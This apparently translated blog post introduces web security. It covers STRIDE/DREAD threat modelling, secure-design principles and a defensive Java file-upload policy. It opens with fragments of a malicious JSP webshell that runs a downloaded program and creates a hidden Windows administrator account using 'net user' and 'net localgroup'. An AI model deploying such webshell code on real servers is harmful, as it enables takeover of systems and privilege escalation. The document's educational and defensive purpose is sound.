alk In Web Security (Security Worldview): Developing a Secure Website

Writer: BYSocket (泥沙砖瓦浆木匠)

  • Weibo: BYSocket

  • Douban: BYSocket

Reprint it anywhere you want.

Why write about Web Security?


A Java file can hack your server. One JSP can download any file. How is this done?
  1. Write a JSP and upload it to the server.
  2. Use the JSP to download any malicious program (the "bug") with HttpClient.
  3. Launch the virus and read or add admin information or data.
We can see some of this from what I wrote. It's easy but useful:

// IsWindows(), strExeFile (path of the downloaded program) and out are defined elsewhere in the JSP
if (!IsWindows())
{
    // On a non-Windows host, make the downloaded file executable first
    Process process = Runtime.getRuntime().exec("chmod 777 " + strExeFile);

    if (process.waitFor() != 0)
        out.println("FAIL ---> when open file");
}

// Run the downloaded program
Process process = Runtime.getRuntime().exec(strExeFile);
if (process.waitFor() == 0)
    out.println("SUCCESS ---> When open the file");


Java is used to launch the malicious program, and then to obtain an administrator user.

// IsWindows(), strAcc, strPwd and out are defined elsewhere in the JSP
if (IsWindows())
{
    // Create a local account, then put it in the Administrators group
    String execStr = "cmd.exe /C " + "net user " + strAcc + " " + strPwd + " /add";
    Process process = Runtime.getRuntime().exec(execStr);

    if (process.waitFor() == 0)
    {
        Runtime.getRuntime().exec("cmd.exe /C " + "net localgroup administrators " + strAcc + " /add");
    }
    else
        out.print("FAIL ---> when " + execStr);
}

This shows how Java can be used to add an administrator user.

These are some of the injections we can see anywhere, so we need to learn Web Security. First we can learn from the history of the Web.
 

Some Web Security basics you need to know


As the environment gets worse, with haze for example, many people wear masks when they go out. We protect ourselves by trusting the mask, and web security works the same way.
  Note: 'Web Security is based on trust; every Web Security design is also based on trust.'
Many web attacks are like haze:
  1. XSS
  2. CRLF Injection
  3. XPath Injection
  4. HTML Injection
  5. JavaScript Injection
 
[Figure: XSS Development]



So there is a question: 'How do we analyse the web security of a piece of software or a project?'


 

STRIDE and DREAD by Microsoft

STRIDE

STRIDE is a system developed by Microsoft for thinking about computer security threats. The threat categories are:
  1. Spoofing of user identity
  2. Tampering
  3. Repudiation
  4. Information disclosure
  5. Denial of Service
  6. Elevation of privilege
 
DREAD
The problem with a simplistic rating system is that team members usually will not agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model is used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:
  1. Damage potential: How great is the damage if the vulnerability is exploited?
  2. Reproducibility: How easy is it to reproduce the attack?
  3. Exploitability: How easy is it to launch an attack?
  4. Affected users: As a rough percentage, how many users are affected?
  5. Discoverability: How easy is it to find the vulnerability?
 
So, given these categories, a good Web Security design has the following features:
  1. Solves the problem effectively
  2. Good experience for users
  3. Low coupling
  4. Easy to extend and upgrade

How to Develop a Secure Website


  Note: 'Security is a normal subject and a poised art.'
1. Secure By Default
  This is also about the security of users. We can create a white list and a black list, and limit what users may do.
2. Defense in Depth
  Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful; I have put together a series of eight webcasts on this topic. Here are the 7 levels:
  [Figure: the seven levels of Defense in Depth]

3. Quarantine between Data and Demo
4. Unpredictability
  The parameters may be easy to guess, so make them hard to guess.
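As an added illustration of points 1, 2 and 4 applied to the JSP-upload threat from the start of this post (this is example code, not code from the original post): a hypothetical Java upload policy that allow-lists extensions by default, strips any client-supplied path, rejects double extensions, and stores the file under a random name. The class and method names (UploadPolicy, checkExtension, storagePath) and the upload directory are assumptions.

```java
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.SecureRandom;
import java.util.Locale;
import java.util.Set;
/** Hypothetical upload policy for the JSP-upload threat described above (example, not the post's code). */
public final class UploadPolicy {
    // Secure by default: an allow list of extensions. A black list of ".jsp" alone would miss
    // ".jspx", ".war" and other names the container executes; anything not listed is rejected.
    private static final Set<String> ALLOWED_EXT = Set.of("png", "jpg", "jpeg", "gif", "pdf");
    private static final SecureRandom RNG = new SecureRandom();
    /** Returns the accepted extension of a client-supplied file name, or null to reject the upload. */
    public static String checkExtension(String clientName) {
        if (clientName == null || clientName.isBlank()) return null;
        Path last;
        try {
            // Defense in depth: keep only the final path segment, so "../../webapps/x.png" cannot
            // steer the file out of the upload directory even if a later check is bypassed.
            last = Paths.get(clientName.replace('\\', '/')).getFileName();
        } catch (InvalidPathException e) {
            return null;                       // NUL bytes and similar junk in the name
        }
        if (last == null) return null;
        // Every dotted segment must be allow-listed, which rejects "shell.jsp.png" outright.
        String[] parts = last.toString().toLowerCase(Locale.ROOT).split("\\.", -1);
        if (parts.length < 2) return null;     // no extension at all
        for (int i = 1; i < parts.length; i++) {
            if (!ALLOWED_EXT.contains(parts[i])) return null;
        }
        return parts[parts.length - 1];
    }
    /** Unpredictability: 128 random bits name the stored file; uploadRoot should sit outside the web root. */
    public static Path storagePath(Path uploadRoot, String ext) {
        byte[] buf = new byte[16];
        RNG.nextBytes(buf);
        StringBuilder hex = new StringBuilder();
        for (byte b : buf) hex.append(String.format("%02x", b));
        return uploadRoot.resolve(hex + "." + ext);
    }
    public static void main(String[] args) {
        // Constructed sample names: the first two are rejected, the third is accepted and renamed.
        for (String name : new String[] {"shell.jsp", "shell.jsp.png", "../avatar.PNG"}) {
            String ext = checkExtension(name);
            System.out.println(name + " -> " + (ext == null ? "REJECT" : storagePath(Paths.get("/var/uploads"), ext)));
        }
    }
}
```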
 

Think in Web Security


Like a bucket of water: we trust the bucket and the water, and that is security. When the bucket contains chemical poison, the security is broken.
Note: 'Open Free Share'
Good night~

